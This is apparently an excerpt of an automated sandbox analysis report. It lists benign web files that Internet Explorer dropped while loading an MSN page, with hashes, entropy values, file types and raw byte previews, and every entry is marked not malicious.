                                                                                                                                                                            Preview:.PNG........IHDR................a....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):149741
                                                                                                                                                                            Entropy (8bit):5.369311179888439
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Hz55ZowUSwJUDwK2O7YZ7CV72aXflUgxuZ2BYLgwmjrXwRb1zOGYXJXzC00mJewh:tLoHSsyHw76lUa3KYjkjOGQC00MRuK5f
                                                                                                                                                                            MD5:BB3B39AE9D534552B5B772A8A966E240
                                                                                                                                                                            SHA1:C265C88D6F14BE5F3B1A54F54B61A4DCEE2FCE6F
                                                                                                                                                                            SHA-256:265195B99C4B69FC6E4DF429351B0A60C838F033C182CD46E4BD3689EE67E342
                                                                                                                                                                            SHA-512:A06ABD69276BD303524B905BD39FEC7E2562178F47377B0FC95F5755435436592B1C596981276E2FBEB6A77439A68475A7C066875CAB5D73B954107A18B6D81E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:/*! AST v0.66.0 Updated: 2024-11-18 */!function(e){var t={};function n(a){if(t[a])return t[a].exports;var r=t[a]={i:a,l:!1,exports:{}};return e[a].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,a){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:a})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var a=Object.create(null);if(n.r(a),Object.defineProperty(a,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(a,r,function(t){return e[t]}.bind(null,r));return a},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=9)}([function(e){e.exports=JSON.parse('{"o":{"UT_IFRAME
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 1633 x 708, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):27928
                                                                                                                                                                            Entropy (8bit):7.701164569435742
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:xSufGKAfaoovahBv4apFM4lvzDpqFosGd+Up9FIK0B:jfUMve54E//fCiIK0B
                                                                                                                                                                            MD5:862D29153222B9B15C3C73B61B930335
                                                                                                                                                                            SHA1:391BEBF4BA8910B718C5516491EB1C7D32D4C187
                                                                                                                                                                            SHA-256:3EC8FA41DCE2684102F4A7B2D993388809CC2F6AE0616807CA9E3D94E6D19AC2
                                                                                                                                                                            SHA-512:6FFCB08DE27DFA571C8EF35E7F017F2871482581308C10CF38EFF9A507D02325222B899D667FC86227C2985ACA05F17C1CD33EF4163BE3442F70F8907BD78404
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR...a.................pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..l.IDATx....u.7.0.A......@...T`o.f*.SA...T`...+0UA..BU.X....a,.......u..:.%..`... ..........a. ......................N.....o..z..=.....r!..^..Rr.....J..b.{..x...9^....u.^.?+.......!..kQ`.....$YNo\/..km.4.n...........1H.0\e.$]^w..K.^....r{I......0.I.v.@!...6.r\..JI..n..9W......<.$.O.0.3]...W.|..n.B&%c.)......cI...e.K.^4....ZX!......C$a..rl.x....|%..I...x.]........I..m..a.?.vml76.O.:.lW........0|..!.M..D4.%..Yt..1+......h.$........w..c.B......&I..._.e..R.%c......#..b.K...d.....@c$aZ*....&..R4.F2........0-.r..n.|y#..H.Y..VB.....P....n!......MZ..W,.E.........>V..Z.!..E.ND#{..:...\(......!.Sc..0....Dq....eK......(.$LM.i.K->t.d.g......(.3a*.~.......x.b........\V.^..C...A.....Y......@Y..)X.a.?V..L.R.^.~+......e..)T....x....2.=..y..............L./..!..:^..}.........Y.S...i.Xv.0-K.b>.p&......y.......r..~./>u.U1+........0..!.:..x]...Z(......#.....<~.....s..........
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 375 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):23972
                                                                                                                                                                            Entropy (8bit):7.983082688064765
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:OQCmhN3Hqqm87sSOvS8PJKCqedNV7TMzNjdpNQsjtHnUSQkBmSfYuoq9Dgt:dCmr3KqmIdO68MAnnWNjdpBSSQVfWDgt
                                                                                                                                                                            MD5:64C4757048F068394817EE126FDBA8A6
                                                                                                                                                                            SHA1:3610DC2EB5E3C09809E94BD0694A06C7A51580FF
                                                                                                                                                                            SHA-256:A9FEC8F56726ECA81D0600220A6B168FFF112A5283741FD5EC63509AEDBB51D5
                                                                                                                                                                            SHA-512:373EE45E16D231B2FF8A897A357A52A58B63430E0BCF728867879F2E10E55C631589D6F63C1675E2E40EB1EF7CEB59B15DF18013EA0F3FA352A3B36296F14DAB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR...w.........o.lP....pHYs.................sRGB.........gAMA......a...]9IDATx..g.$Wv&....H_......n......1...g..r.IQg.]..?:gWG.;....s.#........;.!....a`f..n.h...].dV...{.......j.C........|..}......................G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 ..;888l@8rwppp.p............a.........#w......G.............6 .8lh...5.Hn.R......j'R.;|j!..I\7...Z..G...BhB.<}.....G..X..-...w"..]f.v~..+.HI...#._.k.S.k!t...n..;...6..`...G...L...../...1...Hz..:.....j........a.."..M...(..u.L..+m.3.">....i..pq..v.!..p...m7.gH\.v.{.....j,@...w:@.......v.....>).w.......G.r..LKmE.@........K...v0^........v..b...ja....@t`..u.......{D...}./}...}g.NN. 6..]...PS2.q.Ge<..v ..D....B..B.V...D!.T...@>G.....u.m4.Z.XZ.\X...j..F.Y@.... .."z....
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10059
                                                                                                                                                                            Entropy (8bit):7.913212329308868
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:S70+nvdHCvRujNuKWUxG/moExYmstk/xJLfh3GNVEfLwM2jy:SZnvdHzuKW04m8k/xJLJ3GPqcjy
                                                                                                                                                                            MD5:C240C74EE03905C7790DFD4EB11DE84F
                                                                                                                                                                            SHA1:01C1D8B86485AB8267B0DB03E45437EA551FC288
                                                                                                                                                                            SHA-256:2706C0AF76B6CBC23245B640AA4ABA2ADB4D1D52BDB413D16A22C64756A5E450
                                                                                                                                                                            SHA-512:CBC2081183C2D1EDB15732BF1DA6B1CE119524D7E65FE08912B10D738BC558A00C435F29922CBF7CD2E348C0B31B7C001249F29A6A30A51CD2F0A2FB0CA1E703
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......Y..........b4.N..........=.......f........_..Z.?....}3G^F.j..?p..W......R.r..}z.S...V.4u...../?.7..(R..k..........d<t..z.4].."..B....x/.P.>........L..*..,..:.iv....>f;".i.@.i.../.S?...N.jx.....u...:hp...E....C.N.k...._...y?a..8>J.3}.G.G....v.E&....P...I.........f*.GM.."....WE.Y..L..si.....O.K`.A..*.....k.....E.T{./o.g.?..~..m`..s.o*...(A
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 620x304, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):37612
                                                                                                                                                                            Entropy (8bit):7.967758474856965
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:Rmjub4sUz5q/KEqAGpxQgUsFSKK+erPU9sNHwSUyFELh4JMiJFhze:RmjussTHYQgUeSKKZ7UOrEN4JrJFhi
                                                                                                                                                                            MD5:4A48AD85B38D49D9BCF1C1F7FF6DB8D8
                                                                                                                                                                            SHA1:1B8E3D13A9EA9BABABC6153211CE1A4D2D5FBE13
                                                                                                                                                                            SHA-256:0F76C328F2309A72325522B405C00761D6BE5740CC3D3E885CA11D20D0336EEC
                                                                                                                                                                            SHA-512:663C6A6ECBE875418C05232968DDBAEA8A8C1F11DD3023277798B8F464305F4B6BA235A70043C68904AEC44AE997C4E3608B0735E7B9533B0E6C663D113695F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.......................................................................0.l.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...<PO.....Nr...4.C.F...A..~./J.M"...6..h.)1..QB...Sx..J6..+...~.j?/.F.Z_.......>P...&h..F)...)...=..40.....4.i....f.t..r.(...f...u...$.....j\.9..9Wa.w.O...T.R..Ur.....<t../n.......(....&x...n.)qG*.f;?.i1H....g..5..^....P..u8.a..s.M4.M9.w...)D.....q.M.....Z.X`..j3.G=j$......I.ipO4.I5..q..LR.9Ep...i..j9C.L.&....P.i..f.PGZ..f.>...).`......6...R...)E!...
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9820
                                                                                                                                                                            Entropy (8bit):7.923748616593692
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:StdN3ccQqHawH703vdlA92LZRjz5KOZU0YmsLtpUPfxbke:StdChUawH703vdlA9oH35KO+msLHURge
                                                                                                                                                                            MD5:CE824D352B40636D772865A22A5CC64A
                                                                                                                                                                            SHA1:EBDFD44EF7E583462CC7974A7E47351D18FAA0DC
                                                                                                                                                                            SHA-256:5F2B909F010BE7CFF14CE68F19E7031794DE0DE3F533B2168BC2D5DD794D6732
                                                                                                                                                                            SHA-512:509950EA42666EA4302233ABE2857CC9E50602DAAB421615DE986284FBEAE8375E50D1CA89CE6759BE405BCE24F6EBBFA9F4C8D4CEFCC8DE93DB79C328A3D266
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....E}...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E....(.E..QE..QE..QE..QE..Q@..(..b..(...z..e=~..7.................(...=(..=)..X.eR..<.......m...,2.-...in....zQ.zWMk.......w..d.%.oVW.o.....*..y....Y}b..k.2x.+..?.J?.J.e.c..?.[.......U......KO.D.:.....@&..I.%..W..........{..s..m.s.g..o.Q..q.Z..........P.....c...zm...[.zj...m...Twf.P94.I]..........ZY.Mqq&|..M........A
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (57498), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):194095
                                                                                                                                                                            Entropy (8bit):5.452846000918709
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:YpeydBFOGFxiq6C8khsNyh/P9OZ8TixY3:YpeyAGFxx6C8hNyhX91OxY3
                                                                                                                                                                            MD5:64191DEBC4F7F9F77445F9BFB005006B
                                                                                                                                                                            SHA1:57D328AF982F847B2DCBE8902A3A03B1F5AEE0AF
                                                                                                                                                                            SHA-256:87D84C1F7A8E89B4733732558702C617AC4A16982A6D06AE5A92C54B6021E8BA
                                                                                                                                                                            SHA-512:8B9F4EB45B16C79E7760555946D0B732AB67042CF2E395822F7001B1DFA397B97C63304FD97A6855F5A4E8DB20030C89F35E81A852C5F1636089DF4443B4300C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!DOCTYPE html>..<html lang="en-us" dir="ltr" >..<head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,cprg-hp-rdug2,prg-1sw-homemsn,prg-1sw-saxaiv2,prg-hometo-hpmsn,prg-hp-rdcv,prg-hp-switchfeed,prg-msn-id,prg-pr2-homemsn,prg-searchnewt,prg-ad-stab-bn,prg-stab-bn,pnpwxexpire90,ads-flrmgp-noise-t,sid-flrnoise2,datacollection,prg-1sw-sacfx2-en-nsfreq-c,prg-1sw-sageex4b,prg-1sw-sa-capann1t3,prg-1sw-bgabrtpg-r,prg-1sw-rev_abrtpg,prg-1sw-rev_bg_abrtpg,prg-1sw-tmuidsyncrfwoerr,prg-1sw-refreshp,prg-1sw-tmuid1ssync,1s-ntf1-fgdip6,1s-wpo-pr1-sdshp15,prg-1sw-deferpt,prg-1sw-deferp,2409-new-bing-design-c,routefinanceprod,routegraphexp,prg-adspeek,1s-ntf1-rdid2a,1s-ntf1-fsptbrc,1s-ntf1-pnots,1s-ntf1-rdid2,1s-ntf1-rdidx2,prg-1sw-monexpb,prg-1sw-pnotia,prg-p1-ts4cold,prg-pr2-widget-tab,traffic-tran-ny-c,prg-p2-ldnyct-transit,prg-p2-tran-trd,btie-cp-t1,btie-tagindexc,1s-fcrypt,prg-cookiecont,1s-prong1-serpre-co,1s-prong1-serpre-c,prg-1sw-saccunifyv6t1,prg-ctr
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25586
                                                                                                                                                                            Entropy (8bit):4.841709251634318
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:Q2SDS0tKg9E05TFkUEV75tfFf6EE6Z8bPaCye1LeauzLFvHC4u:CJXE05CUEV75tfh6Eda2aGFvHru
                                                                                                                                                                            MD5:04E8885641EF28A35DA589367E0E3082
                                                                                                                                                                            SHA1:2D76CAB90E7287B6B793808B0B221A04F365980A
                                                                                                                                                                            SHA-256:EADC212773B7A6EDD895513E436ACDE740DBF98EE77E3F4F07E960CBE4881FA1
                                                                                                                                                                            SHA-512:BC4872233D27E1E3B3E755B18DA0BE92E3259ED46E1373DCE1C8E3CE46E2BC6AB7AF2391662E50EC648A995112F1EE021CB201CF4077EA11BD30B1227F504DEE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR...`...`.....m..o....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3532
                                                                                                                                                                            Entropy (8bit):7.898834558255451
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:C/6rD86PqmSUC2jKD/YDIkYCsPC7eKckLHvis8aVyt51nl648svBInwA9NunIbQx:CSrXzC7jY7l+U/ckLPiaG79vQMXYRLu
                                                                                                                                                                            MD5:47D01EE8DA7EF964B63B713A8562EB5F
                                                                                                                                                                            SHA1:742B956BD1BFEC102353CBE7050A99B8046A1A50
                                                                                                                                                                            SHA-256:FCCB19F39DD8A2AB0B87B212A020B5B61CCC954505DC8DF3799D9779382F0E4F
                                                                                                                                                                            SHA-512:BDBB9A109E4E39B885A40F91A5E2183443036B4B84B014F6A857645FA622DCA3A59C3B5B4BE100174E609216E795D5E01E4F04FD83BE490648571AF8358589F0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR...`...`......w8....pHYs.................sRGB.........gAMA......a....aIDATx..\.p.....>..."$@.+.....@|.8M.....2...@..../D.2.QQpFh.%..Z.I.[..tL.P..(..I..bB...l..M......._f...=......s.F.|m.lH..lH.M.d..H.M.d..H.M.d..H.M.d..H.M.d..H.M.d..H.M.d..H.M.d..H.........8i^.A3C........}. ..-.....6z!..\M.2&Q.+.|..j.:C..*....:}M4\...%I..)..&2..B=#.8.G....s.'..7..1...=O..x...?..aA....;UW[XDQ.`.2S...Y[......l..$.....'Ew[......^..n....M)N.....X.w.u;Z..,fQ.o.S...v...S.,$.O@.If.(...#3...dC:.3B._`B.uF._`T.$...ihV....h..d2BF.....!.H'...D.$.;....k_.t..Y..: .:.A= ..*g.&............rK.m5$.CF..1]...a...o.;.`S...5._;T.K.....:v.K-...lN5U.:..4...K...+.....4.......e.i.U..`l.s.Pm......Z.?....X.5Ac.@...57......U....K.[.p.`.._.....).....'+ai...W.tZS..m....6^.u.X.3...@T;...ic........._..|...)|....s.......R..ZXG.wHW.M3..h|../u....^................Ku].....Q..eO..P.....v0K...q.....I6...../....|...e......i>..v...v..v...BL.A..X."H[.K.. .=^2.;z....9...d,..G.5.....
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4740
                                                                                                                                                                            Entropy (8bit):5.320014461091607
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YYP1ro/cBKXF5oZhVcFI6u6Q+w2xiVKIqHuqJ9J1IniVKIqHuqKXFf7B1Z7VxIqz:r0cBCMOBvJ2nisCFEE0t5WQirtEm
                                                                                                                                                                            MD5:6758C52F837D81262794C8F4085C2DE8
                                                                                                                                                                            SHA1:E04B9878D84532740B0F6A6CD88BB4B4C49C74D1
                                                                                                                                                                            SHA-256:E3C953933AD86C8DEB2903D9E5398EDA4C464F702DE504A8E6E8D69C88D6A579
                                                                                                                                                                            SHA-512:EC119FB6386C4544566A5F6F8876EDC55E57EE253C460BE72413922110C698BC404302EEA668AEDF23D00F1B50D01D7E33968BC415322A57C5994E303F09B0DE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"$type":"list","title":"","_isPublishingLocked":false,"_id":"BBI4MeJ","_name":"MGXStoreWebPromo (old Backfill list - DO NOT DELETE)","_sourceMetering":{"isMetered":false},"_lastEditedDateTime":"2024-12-10T20:39:35Z","_links":{"self":[{"href":"cms/api/amp/list/BBI4MeJ"}],"parent":[{"href":"cms/api/amp/section/BBREXz4"}],"children":[],"feed":[],"provider":[],"references":[{"href":"cms/api/amp/image/AA1pt3D8"},{"href":"cms/api/amp/image/AA1pt11O"},{"href":"cms/api/amp/image/AA1vcIGr"},{"href":"cms/api/amp/image/AA1q4Ts4"},{"href":"cms/api/amp/image/AA1vlKur"},{"href":"cms/api/amp/image/AA1v7B4b"},{"href":"cms/api/amp/image/AA1rtsRJ"},{"href":"cms/api/amp/image/AA1uj2IY"}],"section":[]},"tagEvaluationGroups":{"_tagsHash":"3145739","tags":[],"vectors":[]},"_locale":"en-us","sourceId":"BBlbsHE","keywords":[],"facets":[],"labels":{"category":[]},"list":[{"link":{"href":"https://www.lendingtree.com/?splitterid=home-equity&cproduct=homeequity&cchannel=content&csource=tradingdesk&esourceid=6475
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):533
                                                                                                                                                                            Entropy (8bit):7.415663553371965
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7Ya7/6Ts/o7hJW8/t8oX8qUkUGGVIXC/zoZ3VYZwWSVR:E/6pzWK+q/UGGMC/zw3oGVR
                                                                                                                                                                            MD5:B6162D100379E7F4EF709BA5C26D1BA8
                                                                                                                                                                            SHA1:AEA4244C56F00AA26064134863157A6EE9D7ABB9
                                                                                                                                                                            SHA-256:DCA74022BEBB4F12F8EFADD226C9413CAFFF9193420D604DE8A398642172AACA
                                                                                                                                                                            SHA-512:CC64207C45F85255F34A157C9370A46EBD4A2B3A674E639838EF7582FD93D68F91A275C577E2FC9A46674EC765D8CC43A5BE28B281FCD5006D38D0C6F02E2058
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR...<... .....N.......pHYs.................sRGB.........gAMA......a.....IDATx..=O.1....$....1..7.....p32..)..Yw..p..IL.$qT'......1.#.h..j.5...9...~...w.....oe.....]8,..|..........``.$a.K.&Lq........D,D..8e.c.....fQ...u..%.(..b..8A......,>@6....Y*...9.(...d7........,!zr.N...T}.....j...NY'..|.=N2Q&<?3....@..-.e.h....F#..2.v...n..!-.e..&........%.e........y.c.y,.e........4'40.t"...B.........D.../[D..6j....^>.....g...3...5<Hv.H../M.+Y`.......OXw<a.al..aF.@.../.E....=;S.K....s.......IEND.B`.
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 7 x 13, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                            Entropy (8bit):5.986656121330302
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:yionv//thPlyyta2/uDlhlp8Lts7CX9/2yx24lSXqU3hjg/BFCb0cCHxlbVdMaW9:6v/lhP1b/6TsR/R0Zjgz89CXVdMndp
                                                                                                                                                                            MD5:34760615AB0C180EB4B48739297FD0F2
                                                                                                                                                                            SHA1:789438D09CC27A08879B1A9686C82527270E7C24
                                                                                                                                                                            SHA-256:360C33D59E7358579601909D4CE91F1BCABF9E07BEB8F69D50C226D7D8F91260
                                                                                                                                                                            SHA-512:1CE7E574D45D123C6B52119907E74D71B842F1CC380D79AEF876FDBC9FDB663F385BB4191650813D2E66EFE24265FD36EC944AF95F372C0413EDCF11361CA666
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR.............e.t.....pHYs.................sRGB.........gAMA......a....ZIDATx......@.EA.`...U..1\.......X]...G..{..HU.4Uj.`..O .3;..\..!3...q....[s./.@@..p...>.`(k..2.....IEND.B`.
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4286
                                                                                                                                                                            Entropy (8bit):5.912342955561912
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:YY2q7UYWIzFhJFYo6syPYmSTZYVVQQT/VfygN6:YYh7TWqFpzTTGjT/VfyZ
                                                                                                                                                                            MD5:A73B8189E32D3A97AE2FBF1A57931D49
                                                                                                                                                                            SHA1:560A8EA628A89A82233BF4288166B54789242966
                                                                                                                                                                            SHA-256:855F6B5EEA22A22F5F4ABCCEEED4B8969EFB3A99443036EB5EB64F5F46C8FD8E
                                                                                                                                                                            SHA-512:2B016E28A7E63DE8FCAD90DDB38CCD5D875A22CF53D723E055B7C7C9B7589CB818883234C6682CA25112AF3CB4BA61A1AED384C1638C04905FC6FAFDD37F79A4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...... .... .........(... ...@..... .................................G..."...?..<2...)...'...-...8..uD...@...8...............2...2...1...1...2...4...7...6.......................................T...Q...S..*J...@...9...7...:...B...K...U.|/G...[.r.....C...=...?..c@...D...E...D...D..{]...H...................................i.a.:...].p.U.{.N...H...F...H...L...S.~.\.q.f.c4`.h...g.R...O...P...S...V...V...U...S...S.. T...................................m.V.o.R.i.^.a.j.Z.u.T.}.R...S...V.z.\.q.e.e.l.V.i.E j.H.Y...Y...Z...Z...Z...Z...Z...Y...Y..KY...................................g.E.e.A.j.K.k.X.f.c.`.k.^.o.^.n.a.j.f.c.l.X.h.H.[.5.E...U...[...[...[...Z...Z...Z...Z...Z..cZ...................................Z.5.N.(.[.6.d.B.k.P.k.X.j.].j.].k.Z.m.S.h.H.\.7.M.$.@..SK.8.]...Z...[...[...[...[...[...[..d[...................................M.&.L.#.L.#YR.*.].7.d.B.h.H.j.I.h.G.c.?.Z.4.N.%.?...=...}h....}.yb.\y..Z...[...[...[...[..Q[.......................................A...@...B...I...Q.(.V./.X.1.V.0.Q.
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):89947
                                                                                                                                                                            Entropy (8bit):5.290839266829335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:ENjxXU9rnxD9o5EZxkMVC6YLtg7HtDuU3zh8cmnPMEgWzJvBQUmkm4M5gPtcNRQK:EcqmCU3zhINzfmR4lb3e34UQ47GKL
                                                                                                                                                                            MD5:CF2FBBF84281D9ECBFFB4993203D543B
                                                                                                                                                                            SHA1:832A6A4E86DAF38B1975D705C5DE5D9E5F5844BC
                                                                                                                                                                            SHA-256:A6F3F0FAEA4B3D48E03176341BEF0ED3151FFBF226D4C6635F1C6039C0500575
                                                                                                                                                                            SHA-512:493A1FE319B5C2091F9BB85E5AA149567E7C1E6DC4B52DF55C569A81A6BC54C45E097024427259FA3132F0F082FE24F5F1D172F7959C131347153A8BCA9EF679
                                                                                                                                                                            Malicious:false
